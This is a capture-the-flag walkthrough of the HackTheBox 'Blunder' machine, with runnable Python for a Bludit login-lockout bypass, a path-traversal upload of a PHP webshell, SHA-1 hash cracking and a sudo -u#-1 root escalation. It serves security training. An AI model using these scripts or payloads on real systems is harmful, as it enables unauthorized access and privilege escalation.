Blunder 10.10.10.191
Persistence is very important. You should not give up unless you are forced to give up (Elon Musk)
Last updated
Blunder is a Linux machine from HackTheBox. It is a realistic box that requires exploiting a published CVE, which makes it good practice for ethical hacking and penetration testing skills.
After basic enumeration, the only exposed service is a web application built on the Bludit CMS, running on port 80. Directory brute forcing with dirb finds a few hidden files, among them a note that reveals a possible username, "fergus", and an admin login page protected by brute-force throttling.
A web search shows that the brute-force protection of this Bludit version can be bypassed, which yields an administrative account. The admin panel's image upload function accepts a PHP reverse shell, but the path where the uploaded file lands cannot be found. A second search turns up a directory-traversal CVE in Bludit; following its PoC gives low-privilege access as the web server user.
Enumerating the system reveals a newer Bludit installation next to the running one, together with its file-based user database. The database holds a SHA-1 password hash for the user hugo. Cracking it with an online lookup tool gives hugo's password and a shell as that user.
Enumerating again with linpeas shows that the installed sudo version has a known privilege-escalation bypass. Following the Exploit-DB entry finally gives root.
130n@calvinlai.com
Target Machine: 10.10.10.191
Attacker Machine: 10.10.14.16
Enumeration Strategy
Only port 80 is open, so the focus is the web application and any CVE affecting it.
Using the following tools, one folder and two files are found: /admin/, /robots.txt, and /todo.txt
gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,php
dirb http://10.10.10.191/ /usr/share/wordlists/dirb/common.txt -o dirb-191.result
gobuster dir -u 'http://10.10.10.191/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-191.result
python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://10.10.10.191/ -e jsp,txt -x 301,302,403,404 --simple-report=dirsearch-191.result
/robots.txt
/todo.txt
/admin/
The source of the login portal shows that the site is built with Bludit CMS version 3.9.2, and /todo.txt hints at a user named fergus.
Brute forcing is not a simple task: the login form carries a CSRF token, and after 10 failed attempts my IP address was blocked. The next step is to search for known weaknesses in this Bludit version, which turns up the blog post linked in the references below.
Using rockyou.txt as the password list failed to find the login, but a wordlist gathered from the site itself with cewl succeeded.
Enumerating the admin panel after login shows an image upload function. A PHP reverse shell and a ".htaccess" file can be uploaded by bypassing the client-side validation, but the path where the uploaded files land cannot be found.
Searching the exploit database shows a CVE affecting Bludit 3.9.2 that involves directory traversal. The PoC script shows that the uuid parameter of the upload request controls the directory the file is written to.
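The bypass described above, put together as an added example; this is not the writeup's own script and not rastating's original PoC. Each attempt fetches a fresh CSRF token and session cookie from the login page, then POSTs the credentials with a random X-Forwarded-For header, because Bludit 3.9.2 keys its failed-attempt counter on that header when it is present. The BLUDIT-KEY cookie name, the form field names and the redirect-into-/admin/ success check follow the Bludit 3.9.2 login flow; the cewl invocation in the comment and the FakeBludit class are constructed so the logic can be exercised offline.

```python
import random
import re
import urllib.error
import urllib.parse
import urllib.request

# Target and login path from the writeup; the rest of this file is an added
# example, not the writeup's own script or rastating's original PoC.
BASE_URL = "http://10.10.10.191"
LOGIN_URL = BASE_URL + "/admin/login"
TOKEN_RE = re.compile(r'name="tokenCSRF"\s+value="([0-9a-zA-Z]+)"')
KEY_RE = re.compile(r"BLUDIT-KEY=([^;]+)")


def extract_csrf_token(html):
    """Bludit embeds a fresh tokenCSRF in the login form; every attempt must
    fetch and replay it or the POST is rejected before the password is checked."""
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


def spoofed_forwarded_for():
    """Bludit 3.9.2 counts failed logins per client IP and takes that IP from
    X-Forwarded-For when the header is present. A random address per request
    means no single counter ever reaches the lockout threshold."""
    return ".".join(str(random.randint(1, 254)) for _ in range(4))


def http_transport(method, url, headers=None, body=None):
    """urllib transport that does NOT follow redirects: a 302 into /admin/
    is the success signal we want to observe rather than chase."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None
    req = urllib.request.Request(url, data=body, headers=headers or {}, method=method)
    try:
        resp = urllib.request.build_opener(NoRedirect).open(req)
    except urllib.error.HTTPError as err:
        resp = err
    hdrs = {k.lower(): v for k, v in resp.headers.items()}
    return resp.getcode(), hdrs, resp.read().decode(errors="replace")


def brute_force(username, candidates, transport=http_transport):
    """Return the candidate that makes Bludit redirect into /admin/, else None."""
    for password in candidates:
        _, hdrs, html = transport("GET", LOGIN_URL)
        token = extract_csrf_token(html)
        key = KEY_RE.search(hdrs.get("set-cookie", ""))
        if token is None or key is None:
            raise RuntimeError("login page gave no CSRF token or session cookie")
        body = urllib.parse.urlencode({"tokenCSRF": token, "username": username,
                                       "password": password, "save": ""}).encode()
        headers = {"X-Forwarded-For": spoofed_forwarded_for(),
                   "Cookie": "BLUDIT-KEY=" + key.group(1),
                   "Referer": LOGIN_URL,
                   "Content-Type": "application/x-www-form-urlencoded"}
        status, hdrs, _ = transport("POST", LOGIN_URL, headers, body)
        if status in (301, 302) and "/admin/" in hdrs.get("location", ""):
            return password
    return None


class FakeBludit:
    """Constructed offline stand-in for the login endpoint so the logic above
    can be exercised without the box: it enforces the CSRF token, locks out an
    X-Forwarded-For address after 10 failures, and redirects on success."""
    def __init__(self, username, password, max_attempts=10):
        self.creds = (username, password)
        self.max_attempts = max_attempts
        self.failures = {}
        self.token = "c0ffee"

    def __call__(self, method, url, headers=None, body=None):
        if method == "GET":
            html = '<input type="hidden" name="tokenCSRF" value="%s">' % self.token
            return 200, {"set-cookie": "BLUDIT-KEY=sess1; path=/"}, html
        form = dict(urllib.parse.parse_qsl(body.decode()))
        ip = headers.get("X-Forwarded-For", "10.10.14.16")
        if self.failures.get(ip, 0) >= self.max_attempts:
            return 200, {}, "IP address has been blocked"
        if form.get("tokenCSRF") == self.token and \
           (form.get("username"), form.get("password")) == self.creds:
            return 302, {"location": BASE_URL + "/admin/dashboard"}, ""
        self.failures[ip] = self.failures.get(ip, 0) + 1
        return 200, {}, "Username or password incorrect"


if __name__ == "__main__":
    # Real use: feed it a wordlist built from the site with cewl, for example
    #   cewl -d 2 -m 5 -w cewl.txt http://10.10.10.191   (assumed invocation)
    with open("cewl.txt") as fh:
        words = [w.strip() for w in fh if w.strip()]
    print(brute_force("fergus", words))
```

The FakeBludit run in the usage shows the point of the header: more than ten wrong guesses from one address would be blocked, but every request arrives from a different spoofed address and the counter never fills. Against the real box, leave the redirect handler disabled as above; following the 302 would land on the dashboard and hide the signal you are looking for.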
As the upload validation applies only on the client side, Burp is used to change the upload parameters (the filename value and the uuid), and the PHP reverse shell and .htaccess files are written into the /tmp/ folder under bl-content. The reverse shell then executes by visiting http://10.10.10.191/bl-content/tmp/reverse.php
This gives an initial shell as the web server account.
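The traversal upload described above, as an added example that is neither the writeup's nor the PoC's code. It shows why the files land in bl-content/tmp/: the uuid field is joined to the page-upload directory without any check, so ../../tmp walks out of it. The endpoint path and the field names uuid, tokenCSRF and images[] are assumptions about Bludit 3.9.2's admin upload form (confirm them in Burp), the payload contents are constructed placeholders, and is_safe_uuid is one hardened check written here (assuming Bludit's page uuids are 32 hex characters), not the upstream fix.

```python
import posixpath
import re
import urllib.request
import uuid as uuidlib

# Paths from the writeup. The form field names (uuid, tokenCSRF, images[]) are
# an assumption about the Bludit 3.9.2 admin upload form; confirm them in Burp.
BASE_URL = "http://10.10.10.191"
UPLOAD_URL = BASE_URL + "/admin/ajax/upload-images"
UPLOAD_ROOT = "bl-content/uploads/pages"   # where Bludit stores page images
TRAVERSAL_UUID = "../../tmp"               # lands in bl-content/tmp instead

# Constructed payloads. The PHP stub stands in for a real reverse shell; the
# .htaccess content is an assumption that keeps Apache from applying parent
# rewrite rules to the dropped file and makes sure .php is handed to PHP.
REVERSE_PHP = b"<?php system($_GET['cmd']); ?>\n"
HTACCESS = b"RewriteEngine off\nAddType application/x-httpd-php .php\n"


def resolve_upload_path(uuid_value, filename):
    """Where the server ends up writing: the request's uuid is joined to the
    upload root without validation, so '../../tmp' escapes it."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, uuid_value, filename))


UUID_RE = re.compile(r"^[0-9a-f]{32}$")   # assumed shape of a Bludit page uuid


def is_safe_uuid(uuid_value):
    """Hardened check: only a bare hex token is accepted as a directory name,
    so neither a separator nor '..' can reach the path builder."""
    return UUID_RE.match(uuid_value) is not None


def build_multipart(fields, files):
    """Hand-rolled multipart/form-data so the filename is exactly what we set:
    the same edit the writeup makes in Burp, done in code."""
    boundary = "----blunder" + uuidlib.uuid4().hex
    body = b""
    for name, value in fields.items():
        body += ('--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n'
                 % (boundary, name, value)).encode()
    for name, (filename, content, ctype) in files.items():
        body += ('--%s\r\nContent-Disposition: form-data; name="%s"; filename="%s"\r\n'
                 'Content-Type: %s\r\n\r\n' % (boundary, name, filename, ctype)).encode()
        body += content + b"\r\n"
    body += ("--%s--\r\n" % boundary).encode()
    return "multipart/form-data; boundary=" + boundary, body


def upload_request(session_key, token, filename, content):
    """Build the authenticated upload. session_key is the BLUDIT-KEY cookie and
    token the tokenCSRF value of your logged-in admin session."""
    ctype, body = build_multipart(
        {"uuid": TRAVERSAL_UUID, "tokenCSRF": token},
        {"images[]": (filename, content, "image/png")})
    headers = {"Cookie": "BLUDIT-KEY=" + session_key, "Content-Type": ctype,
               "Referer": BASE_URL + "/admin/new-content"}
    return urllib.request.Request(UPLOAD_URL, data=body, headers=headers, method="POST")


if __name__ == "__main__":
    import sys
    key, token = sys.argv[1], sys.argv[2]   # copied from the browser session
    for name, data in ((".htaccess", HTACCESS), ("reverse.php", REVERSE_PHP)):
        with urllib.request.urlopen(upload_request(key, token, name, data)) as resp:
            print(name, resp.status)
    print("now fetch", BASE_URL + "/bl-content/tmp/reverse.php")
```

resolve_upload_path is the whole vulnerability in one line: normalising the joined path shows that a uuid of ../../tmp turns bl-content/uploads/pages/ into bl-content/tmp/, which is web-reachable and is exactly where the writeup's reverse.php was found. A server-side allowlist on the uuid, as in is_safe_uuid, closes it regardless of what the client-side validation does.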
The system files show that this Bludit install uses a file-based database: three hashed passwords are found in users.php across the two Bludit folders. According to the official password recovery tool (linked below), these hashes are SHA-1. Using an online lookup tool on the hash, the password for the hugo account is recovered: Password120.
Hugo reuses this password for his system account. Spawning a PTY shell allows use of the su command, which gives the low-privilege user account.
Download and run linpeas.sh to study the environment and search for possible privilege-escalation paths on Linux hosts. The result flags the installed sudo version as one possible path.
Searching Exploit-DB again identifies a CVE exploit for this sudo version. Following its instructions gives root.
Missing patches are very common in real-life systems; keeping systems patched avoids known attacks like these.
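The hash recovery step, as an added offline alternative to the online lookup (example code, not the writeup's or the recovery tool's). It parses a constructed users.php in the shape Bludit uses (one PHP guard line followed by JSON) and tries each candidate both as sha1(password + salt) and as a bare sha1(password), since the entry for hugo carries no salt. Every hash in the sample is generated inside the file; only Password120 comes from the writeup.

```python
import hashlib
import json


def bludit_hash(password, salt=""):
    """Bludit stores sha1(password + salt) as a hex digest. An entry with an
    empty salt is a bare SHA-1 of the password, which is what lookup sites crack."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


# Constructed stand-in for bl-content/databases/users.php: a PHP guard line,
# then JSON. The admin hash is generated from a made-up password; hugo's is
# generated from the password the writeup recovers.
SAMPLE_USERS_PHP = "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n" + json.dumps({
    "admin": {"nickname": "Admin", "role": "admin",
              "password": bludit_hash("not-in-any-wordlist", "x7qz"), "salt": "x7qz"},
    "hugo": {"nickname": "Hugo", "role": "author",
             "password": bludit_hash("Password120"), "salt": ""},
}, indent=1)


def load_bludit_db(text):
    """Drop the PHP guard line(s) and parse the JSON body that follows."""
    body = "\n".join(line for line in text.splitlines()
                     if not line.lstrip().startswith("<?php"))
    return json.loads(body)


def crack_entry(entry, candidates):
    """Try each candidate with the stored salt and as a bare SHA-1, because
    not every entry in these files was written with a salt."""
    target = entry.get("password", "").lower()
    salt = entry.get("salt") or ""
    for pw in candidates:
        if bludit_hash(pw, salt) == target or bludit_hash(pw) == target:
            return pw
    return None


def crack_all(db, candidates):
    """Map every user in the database to the cracked password or None."""
    return {user: crack_entry(entry, candidates)
            for user, entry in db.items() if isinstance(entry, dict)}


if __name__ == "__main__":
    import sys
    # usage: crack.py [users.php] [wordlist]; defaults run the constructed sample
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_USERS_PHP
    words = ([w.rstrip("\n") for w in open(sys.argv[2])] if len(sys.argv) > 2
             else ["letmein", "Password120", "qwerty"])
    for user, pw in crack_all(load_bludit_db(text), words).items():
        print(user, "->", pw if pw else "(not cracked)")
```

Cracking locally with the same wordlist gives the same answer as the lookup site and keeps the hashes from a client system off a third-party server, which matters on a real engagement even though it is irrelevant for a lab box. Entries that do carry a salt, like the constructed admin one, will not appear on a plain SHA-1 lookup site at all; the salted form has to be tried explicitly.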
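The sudo check, as an added example (not the writeup's code and not the Exploit-DB entry itself). It encodes both preconditions of Exploit-DB 47502, the sudo runas bypass tracked as CVE-2019-14287: a sudo version below 1.8.28, and a sudoers rule of the form (ALL, !root) CMD, which the -u#-1 trick defeats because sudo turns -1 into uid 4294967295 and setresuid() leaves the effective uid at 0. The sample sudo -l output is constructed; the rule on the box is an assumption and has to be read from your own sudo -l.

```python
import re
import subprocess

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")
RUNAS_RE = re.compile(r"\(\s*ALL\s*,\s*!root\s*\)\s*(\S+)")

# Constructed sample of `sudo -l` output in the shape the exploit needs: the
# user may run a command as any user except root. The real rule on the box is
# an assumption here; read it from your own `sudo -l`.
SAMPLE_SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""


def parse_sudo_version(text):
    """Turn 'Sudo version 1.8.25p1' (from sudo -V or linpeas) into (1, 8, 25, 1)."""
    m = VERSION_RE.search(text)
    return tuple(int(x or 0) for x in m.groups()) if m else None


def vulnerable_to_47502(version):
    """Exploit-DB 47502 / CVE-2019-14287: sudo before 1.8.28 accepts -u#-1,
    maps it to uid 4294967295, and setresuid() leaves the process as uid 0,
    so a '!root' runas exclusion is bypassed."""
    return version is not None and version < (1, 8, 28, 0)


def bypassable_commands(sudo_l_output):
    """Commands allowed with '(ALL, !root)': the only rule shape this exploit
    applies to. A plain (ALL) or a (root) rule needs a different path."""
    return RUNAS_RE.findall(sudo_l_output)


def escalation_command(version_text, sudo_l_output):
    """Return the argv to run, or None if either precondition is missing."""
    cmds = bypassable_commands(sudo_l_output)
    if not vulnerable_to_47502(parse_sudo_version(version_text)) or not cmds:
        return None
    return ["sudo", "-u#-1", cmds[0]]


if __name__ == "__main__":
    # -n keeps sudo -l from prompting; drop it if the rule requires a password.
    ver = subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout
    rules = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout
    argv = escalation_command(ver, rules)
    print(" ".join(argv) if argv else "preconditions for 47502 not met")
```

linpeas only reports the version; the second check is the one that decides whether 47502 is usable at all. A version below 1.8.28 with an ordinary (ALL) or (root) rule is not exploitable this way, and a (ALL, !root) rule on a patched sudo simply returns an error for -u#-1.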
References
https://rastating.github.io/bludit-brute-force-mitigation-bypass/
https://raw.githubusercontent.com/bludit/password-recovery-tool/master/recovery.php
https://md5decrypt.net/en/Sha1/
https://www.exploit-db.com/exploits/47502